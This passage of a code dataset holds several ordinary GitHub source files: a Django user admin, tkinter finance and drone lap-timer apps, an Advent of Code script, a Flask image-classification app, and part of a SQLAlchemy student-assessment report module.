'fields':(\n 'is_staff', 'is_superuser','is_active',\n )\n }),\n )\n\n fieldsets = UserAdmin.fieldsets + (\n ('Personal Information', \n {'fields':(\n 'gender', 'city','country','date_of_birth',\n )\n }),\n )\n\n search_fields = ('email', 'phone_number')\n ordering = ['email']\n filter_horizontal = ()\n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n\nadmin.site.register(User, CustomUserAdmin)\n\n","repo_name":"inziani/UnoBackEnd","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41683813564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 12:00:54 2018\n\n@author: wegmarken\n\"\"\"\nimport tkinter as tk\nimport my_date_picker as mdp\nfrom datetime import datetime\nimport math\nimport configparser\n\ndef days_between(d1, d2):\n d1 = datetime.strptime(d1, \"%Y-%m-%d\")\n d2 = datetime.strptime(d2, \"%Y-%m-%d\")\n return abs((d2 - d1).days)\n\nclass Config:\n def __init__(self):\n filename = \"config.ini\"\n config = configparser.ConfigParser()\n rd = config.read(filename)\n if rd == []:\n config[\"DEFAULT\"] = {\"IniAmount\": \"1000\", \"MonthlyIncome\": \"100\"}\n with open(filename, 'w') as configfile:\n config.write(configfile)\n self.ini_amount = float(config[\"DEFAULT\"][\"IniAmount\"])\n self.monthly_income = float(config[\"DEFAULT\"][\"MonthlyIncome\"])\n\nclass MainGUI:\n def __init__(self, root):\n root = root\n root.title(\"Fin\")\n root.geometry(\"640x480\")\n\n self.mainframe = tk.Frame(root)\n self.mainframe.grid(column=0, row=0)\n self.mainframe.columnconfigure(0, weight=1)\n self.mainframe.rowconfigure(0, weight=1)\n\n def add_date_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n btn = tk.Button(self.mainframe, text=\"Date\", bg=\"white\", fg=\"blue\", command=lambda: mdp.MyDatePicker(entry))\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n btn.grid(column=col + 2, row=row)\n\n def add_result_field(self, row, col, func, var):\n btn = tk.Button(self.mainframe, text=\"Result\", bg=\"white\", fg=\"blue\", command=func)\n label = tk.Label(self.mainframe, textvariable=var)\n btn.grid(column=col, row=row)\n label.grid(column=col + 1, row=row)\n\n def add_num_entry_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n\n\n\nroot = tk.Tk()\nm_gui = MainGUI(root)\n\nconfig = Config()\ntoday = datetime.today().strftime('%Y-%m-%d')\n\nstart_amount = tk.DoubleVar()\nstart_amount.set(config.ini_amount)\nm_gui.add_num_entry_field(row=1, col=1, var=start_amount, ltext=\"Start Amount\")\n\nstart_date = tk.StringVar()\nstart_date.set(today)\nm_gui.add_date_field(row=2, col=1, var=start_date, ltext=\"Start Date\")\n\nmonth_income = tk.DoubleVar()\nmonth_income.set(config.monthly_income)\nm_gui.add_num_entry_field(row=3, col=1, var=month_income, ltext=\"Monthly Income\")\n\nend_mi_date = tk.StringVar()\nend_mi_date.set(today)\nm_gui.add_date_field(row=4, col=1, var=end_mi_date, ltext=\"End In. 
Date\")\n\nend_date = tk.StringVar()\nend_date.set(today)\nm_gui.add_date_field(row=5, col=1, var=end_date, ltext=\"End Date\")\nres = tk.DoubleVar()\ndef fres():\n d1 = days_between(end_mi_date.get(), start_date.get())\n to_add = math.floor(d1/30)*month_income.get()\n res.set(start_amount.get() + to_add)\n\nm_gui.add_result_field(row=7, col=1, func=fres, var=res)\n\nroot.mainloop()\n\n\n\n\n","repo_name":"wegmarken2006/tk1","sub_path":"tk1_1.py","file_name":"tk1_1.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73764972328","text":"from tkinter import Tk, Label, Entry, Button, Toplevel, Scrollbar, Listbox, messagebox\r\nfrom PIL import Image, ImageTk\r\nimport io\r\nimport requests\r\nimport re\r\n\r\nclass LapTracker:\r\n def __init__(self, root):\r\n # Initialize the LapTracker class with a Tkinter root window\r\n self.root = root\r\n # Initialize empty list to store lap times for each racer\r\n self.lap_times = []\r\n # Initialize Toplevel window for displaying lap times and setting its value to None\r\n self.lap_time_window = None\r\n self.lap_time_display_window = None\r\n # Initialize list of racer names with empty strings\r\n self.racer_names = [\"\", \"\", \"\", \"\"]\r\n # Initialize lists to store racer name labels and entry widgets\r\n self.racer_labels = []\r\n self.racer_entries = []\r\n # Create racer name labels and entry widgets for each racer\r\n for i in range(4):\r\n racer_name_label = Label(root, text=f\"Racer {i+1} Name:\")\r\n racer_name_entry = Entry(root)\r\n racer_name_entry.insert(0, \"NAME\")\r\n racer_name_label.grid(row=i, column=0, padx=5, pady=5, sticky=\"W\")\r\n racer_name_entry.grid(row=i, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n\r\n lap_time_label = Label(root, text=f\"Racer {i+1} Lap Time:\")\r\n lap_time_entry = Entry(root)\r\n lap_time_entry.insert(0, \"01.00\")\r\n lap_time_label.grid(row=i+4, column=0, padx=5, pady=5, sticky=\"W\")\r\n lap_time_entry.grid(row=i+4, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_entries.append(lap_time_entry)\r\n\r\n # Create a lap time instruction label\r\n lap_time_instruction_label = Label(root, text=\"Edit the name and times (e.g. 
23.456)\")\r\n lap_time_instruction_label.grid(row=4, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" Leave name and time alone if not in use\")\r\n lap_time_instruction_label.grid(row=5, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" I want to say thanks to Ryan and Emily for their time and dedication to teaching programming\")\r\n lap_time_instruction_label.grid(row=6, column=2, padx=3, pady=3, sticky=\"W\")\r\n # Create a submit button to submit lap times\r\n self.submit_button = Button(root, text=\"Submit\", command=self.submit_lap_times)\r\n self.submit_button.grid(row=9, column=1, pady=5, sticky=\"E\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3T2QgC3/45.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(root, image=photo)\r\n label.image = photo\r\n label.grid(row=10, column=0, columnspan=2, padx=5, pady=5)\r\n\r\n # Create an exit button to close the application window\r\n exit_button = Button(root, text=\"Exit\", command=root.destroy)\r\n exit_button.grid(row=11, column=1, pady=5, sticky=\"E\")\r\n\r\n def is_valid_lap_time(self, lap_time):\r\n if lap_time == \"\":\r\n return False\r\n try:\r\n return float(lap_time) > 0\r\n except ValueError:\r\n return False\r\n def is_valid_name(self, name):\r\n # Check if name contains only letters\r\n return bool(re.match(\"^[a-zA-Z]*$\", name))\r\n def show_error_message(self, message):\r\n messagebox.showerror(\"Error\", message)\r\n def submit_lap_times(self):\r\n # Get racer names and lap times from the entry widgets and add them to the lap_times list\r\n lap_times = []\r\n for i in range(len(self.racer_entries)):\r\n if i % 2 == 0:\r\n racer_name = self.racer_entries[i].get()\r\n if not racer_name:\r\n # If racer name is empty, show an error message and return\r\n self.show_error_message(\"Racer name cannot be empty.\")\r\n return\r\n else:\r\n self.racer_names[i // 2] = racer_name\r\n else:\r\n lap_time = self.racer_entries[i].get()\r\n if not self.is_valid_lap_time(lap_time):\r\n # If lap time is invalid, show an error message and return\r\n self.show_error_message(\"Invalid lap time format. Lap time should be in the format mm:ss.ms (e.g. 
23.456).\")\r\n return\r\n elif lap_time:\r\n lap_times.append((self.racer_names[i // 2], lap_time))\r\n # If the lap time display window has not been created, create it and display the lap times\r\n if self.lap_time_display_window is None:\r\n self.lap_time_display_window = Toplevel(self.root)\r\n self.lap_time_display_window.title(\"Lap Times\")\r\n self.lap_time_display_window.geometry(\"400x300\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3mMYs96/69.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(self.lap_time_display_window, image=photo)\r\n label.image = photo\r\n label.pack()\r\n \r\n scrollbar = Scrollbar(self.lap_time_display_window)\r\n scrollbar.pack(side=\"right\", fill=\"y\")\r\n self.lap_time_listbox = Listbox(self.lap_time_display_window, yscrollcommand=scrollbar.set)\r\n self.lap_time_listbox.pack(fill=\"both\", expand=True)\r\n scrollbar.config(command=self.lap_time_listbox.yview)\r\n \r\n copy_button = Button(self.lap_time_display_window, text=\"Copy to Clipboard\", command=lambda: self.copy_to_clipboard(lap_times))\r\n copy_button.pack()\r\n # Iterate over the lap times and add each one to the Listbox widget with alternating colors\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n color = \"blue\" if i % 2 == 0 else \"red\"\r\n self.lap_time_listbox.insert(\"end\", f\"{racer_name}: {lap_time}\")\r\n def copy_to_clipboard(self, lap_times):\r\n # Convert the lap times to a string with each lap time on a new line\r\n lap_times_string = \"\"\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n lap_times_string += f\"{racer_name}: {lap_time}\\n\"\r\n \r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(lap_times_string)\r\n def add_racer(self):\r\n if len(self.racer_labels) < 4:\r\n # Add a new racer to the window with a name label and an entry field for their lap time\r\n racer_name_label = Label(self.root, text=\"Racer Name:\")\r\n racer_name_label.pack()\r\n racer_name_entry = Entry(self.root)\r\n racer_name_entry.pack()\r\n self.racer_names.append(\"\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n \r\n lap_time_label = Label(self.root, text=\"Enter Lap Time:\")\r\n lap_time_label.pack()\r\n lap_time_entry = Entry(self.root)\r\n lap_time_entry.pack()\r\n self.racer_entries.append(lap_time_entry)\r\n\r\nroot = Tk()\r\nroot.title(\"Drone Race Lap Tracker\")\r\nlap_tracker = LapTracker(root)\r\nroot.mainloop()","repo_name":"MasonLWest/FPV-Lap-Timer","sub_path":"FPVLapTrackerFina2l.py","file_name":"FPVLapTrackerFina2l.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72279981928","text":"inFile = open(\"input.txt\")\r\n\r\ncrc = 0\r\n\r\nfor l in inFile.readlines():\r\n inList = l.split('\\t')\r\n inList[-1] = inList[-1].rsplit('\\n')[0]\r\n inList = [ int(x) for x in inList]\r\n crc += max(inList) - min(inList)\r\n\r\nprint(crc)","repo_name":"Flourish3/AdventOfCode","sub_path":"2017/AOC/day2/day2_1.py","file_name":"day2_1.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35628881914","text":"from flask import Flask, render_template, request, 
url_for\nfrom functions import predict_winner\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\nimport os\nfrom werkzeug.utils import secure_filename\n\nUPLOAD_FOLDER = 'static/uploaded_images'\nALLOWED_EXTENSIONS = set(['png','jpg','jpeg','tiff'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html')\n\n@app.route('/play')\n@app.route('/play', methods=['POST'])\n# Post method to run prediction model and return what each person/comp chose and who won\ndef play():\n try:\n model\n except:\n with open('model.json', 'r') as f:\n model = model_from_json(f.read())\n\n # Load in the model weights\n model.load_weights('20_epochs.h5')\n\n # Compile the model\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n if(request.method == 'POST'):\n if 'file' not in request.files:\n return render_template('play.html', predict=None)\n file = request.files['file']\n if file.filename == '':\n return render_template('play.html', predict=None)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n user_image = load_img(str(app.config['UPLOAD_FOLDER'] + '/' + filename), target_size = (150,150))\n user_image = img_to_array(user_image)\n user_image = np.expand_dims(user_image, axis = 0)\n \n os.remove(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n return render_template('play.html', predict=predict_winner(user_image, model))\n \n \n \n else:\n return render_template('play.html', predict=None)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nif __name__ == '__main__':\n app.run()","repo_name":"Jordan-Ireland/CNN","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33517869443","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Jan 13, 2013\n\n@author: tosako\n'''\nfrom string import capwords\nfrom sqlalchemy.sql.expression import and_, or_, null\nfrom edapi.decorators import report_config, user_info\nfrom smarter.reports.helpers.name_formatter import format_full_name\nfrom edapi.exceptions import NotFoundException\nfrom edapi.logging import audit_event\nfrom smarter.reports.helpers.breadcrumbs import get_breadcrumbs_context\nfrom smarter.reports.helpers.assessments import get_cut_points, \\\n get_overall_asmt_interval, get_claims, get_accommodations\nfrom smarter.security.context import select_with_context,\\\n get_current_request_context\nfrom smarter.reports.helpers.constants import Constants\nfrom smarter.reports.helpers.constants import AssessmentType\nfrom smarter.reports.helpers.metadata import get_custom_metadata, \\\n get_subjects_map\nfrom edcore.database.edcore_connector import EdCoreDBConnection\nfrom smarter.reports.student_administration import get_asmt_administration_years_isr\nfrom smarter.security.tenant import validate_user_tenant\nfrom smarter_common.security.constants import RolesConstants\nimport logging\nfrom sqlalchemy.sql.functions import func\n\n\nlogger = logging.getLogger('smarter')\n\n\nREPORT_NAME = 'individual_student_report'\n\n\ndef __prepare_query(connector, params):\n '''\n Returns query for individual student report\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n date_taken = params.get(Constants.DATETAKEN)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_year = params.get(Constants.ASMTYEAR)\n\n fact_asmt_outcome_vw = connector.get_table('fact_asmt_outcome_vw')\n dim_student = connector.get_table('dim_student')\n dim_asmt = connector.get_table('dim_asmt')\n query = select_with_context([\n fact_asmt_outcome_vw.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_asmt_outcome_vw.c.enrl_grade.label('grade'),\n fact_asmt_outcome_vw.c.district_id.label('district_id'),\n fact_asmt_outcome_vw.c.school_id.label('school_id'),\n fact_asmt_outcome_vw.c.state_code.label('state_code'),\n fact_asmt_outcome_vw.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n 
fact_asmt_outcome_vw.c.asmt_grade.label('asmt_grade'),\n fact_asmt_outcome_vw.c.asmt_score.label('asmt_score'),\n fact_asmt_outcome_vw.c.asmt_score_range_min.label('asmt_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_score_range_max.label('asmt_score_range_max'),\n fact_asmt_outcome_vw.c.date_taken_day.label('date_taken_day'),\n fact_asmt_outcome_vw.c.date_taken_month.label('date_taken_month'),\n fact_asmt_outcome_vw.c.date_taken_year.label('date_taken_year'),\n fact_asmt_outcome_vw.c.asmt_perf_lvl.label('asmt_perf_lvl'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score.label('asmt_claim_2_score'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score.label('asmt_claim_3_score'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score.label('asmt_claim_4_score'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_min.label('asmt_claim_2_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_min.label('asmt_claim_3_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_min.label('asmt_claim_4_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_max.label('asmt_claim_2_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_max.label('asmt_claim_3_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_max.label('asmt_claim_4_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_2_perf_lvl.label('asmt_claim_2_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_3_perf_lvl.label('asmt_claim_3_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_4_perf_lvl.label('asmt_claim_4_perf_lvl'),\n fact_asmt_outcome_vw.c.acc_asl_video_embed.label('acc_asl_video_embed'),\n fact_asmt_outcome_vw.c.acc_noise_buffer_nonembed.label('acc_noise_buffer_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_items_nonembed.label('acc_print_on_demand_items_nonembed'),\n fact_asmt_outcome_vw.c.acc_braile_embed.label('acc_braile_embed'),\n fact_asmt_outcome_vw.c.acc_closed_captioning_embed.label('acc_closed_captioning_embed'),\n fact_asmt_outcome_vw.c.acc_text_to_speech_embed.label('acc_text_to_speech_embed'),\n fact_asmt_outcome_vw.c.acc_abacus_nonembed.label('acc_abacus_nonembed'),\n fact_asmt_outcome_vw.c.acc_alternate_response_options_nonembed.label('acc_alternate_response_options_nonembed'),\n fact_asmt_outcome_vw.c.acc_calculator_nonembed.label('acc_calculator_nonembed'),\n 
fact_asmt_outcome_vw.c.acc_multiplication_table_nonembed.label('acc_multiplication_table_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_nonembed.label('acc_print_on_demand_nonembed'),\n fact_asmt_outcome_vw.c.acc_read_aloud_nonembed.label('acc_read_aloud_nonembed'),\n fact_asmt_outcome_vw.c.acc_scribe_nonembed.label('acc_scribe_nonembed'),\n fact_asmt_outcome_vw.c.acc_speech_to_text_nonembed.label('acc_speech_to_text_nonembed'),\n fact_asmt_outcome_vw.c.acc_streamline_mode.label('acc_streamline_mode'),\n fact_asmt_outcome_vw.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_asmt_outcome_vw.c.complete, True).label('complete')\n ], from_obj=[\n fact_asmt_outcome_vw\n .join(dim_student, and_(fact_asmt_outcome_vw.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_asmt_outcome_vw.c.asmt_rec_id))\n ], permission=RolesConstants.PII, state_code=state_code)\n query = query\\\n .where(\n and_(\n fact_asmt_outcome_vw.c.student_id == student_id,\n fact_asmt_outcome_vw.c.rec_status == Constants.CURRENT))\n query = query\\\n .where(and_(\n or_(and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.SUMMATIVE]),\n (or_(fact_asmt_outcome_vw.c.administration_condition == Constants.ADMINISTRATION_CONDITION_INVALID, fact_asmt_outcome_vw.c.administration_condition == null()))),\n and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.INTERIM_COMPREHENSIVE])),\n (or_(fact_asmt_outcome_vw.c.administration_condition == null(),\n fact_asmt_outcome_vw.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED, Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))))\n\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if date_taken is not None:\n query = query.where(fact_asmt_outcome_vw.c.date_taken == str(date_taken))\n if asmt_type is not None:\n query = query.where(dim_asmt.c.asmt_type == asmt_type)\n if asmt_year is not None:\n query = query.where(fact_asmt_outcome_vw.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), dim_asmt.c.asmt_period_year.desc())\n return query\n\n\ndef __prepare_query_iab(connector, params):\n '''\n Returns query for individual student report for IAB\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n asmt_year = params.get(Constants.ASMTYEAR)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n\n fact_block_asmt_outcome = connector.get_table(Constants.FACT_BLOCK_ASMT_OUTCOME)\n dim_student = connector.get_table(Constants.DIM_STUDENT)\n dim_asmt = connector.get_table(Constants.DIM_ASMT)\n query = select_with_context([fact_block_asmt_outcome.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_block_asmt_outcome.c.enrl_grade.label('enrl_grade'),\n fact_block_asmt_outcome.c.district_id.label('district_id'),\n fact_block_asmt_outcome.c.school_id.label('school_id'),\n fact_block_asmt_outcome.c.state_code.label('state_code'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n fact_block_asmt_outcome.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n 
dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_block_asmt_outcome.c.asmt_grade.label('asmt_grade'),\n fact_block_asmt_outcome.c.date_taken_day.label('date_taken_day'),\n fact_block_asmt_outcome.c.date_taken_month.label('date_taken_month'),\n fact_block_asmt_outcome.c.date_taken_year.label('date_taken_year'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_block_asmt_outcome.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_block_asmt_outcome.c.complete, True).label('complete')],\n from_obj=[fact_block_asmt_outcome\n .join(dim_student, and_(fact_block_asmt_outcome.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_block_asmt_outcome.c.asmt_rec_id))], permission=RolesConstants.PII, state_code=state_code)\n query = query.where(and_(fact_block_asmt_outcome.c.student_id == student_id, fact_block_asmt_outcome.c.rec_status == Constants.CURRENT, dim_asmt.c.asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS))\n query = query.where(and_(or_(fact_block_asmt_outcome.c.administration_condition == null(), fact_block_asmt_outcome.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED,\n Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if asmt_year is not None:\n query = query.where(fact_block_asmt_outcome.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), fact_block_asmt_outcome.c.asmt_grade.desc(), fact_block_asmt_outcome.c.date_taken.desc())\n return query\n\n\ndef __calculateClaimScoreRelativeDifference(item):\n '''\n 
calcluate relative difference for each claims\n 1. find absluate max claim score\n 2. calculate relative difference\n '''\n newItem = item.copy()\n asmt_score = newItem['asmt_score']\n claims = newItem['claims']\n maxAbsDiffScore = 0\n for claim in claims:\n score = int(claim['score'])\n # keep track max score difference\n if maxAbsDiffScore < abs(asmt_score - score):\n maxAbsDiffScore = abs(asmt_score - score)\n for claim in claims:\n score = int(claim['score'])\n if maxAbsDiffScore == 0:\n claim['claim_score_relative_difference'] = 0\n else:\n claim['claim_score_relative_difference'] = int((score - asmt_score) / maxAbsDiffScore * 100)\n return newItem\n\n\ndef __arrange_results(results, subjects_map, custom_metadata_map):\n '''\n This method arranges the data retrieved from the db to make it easier to consume by the client\n '''\n new_results = []\n for result in results:\n\n result['student_full_name'] = format_full_name(result['first_name'], result['middle_name'], result['last_name'])\n # asmt_type is an enum, so we would to capitalize it to make it presentable\n result['asmt_type'] = capwords(result['asmt_type'], ' ')\n result['asmt_score_interval'] = get_overall_asmt_interval(result)\n\n # 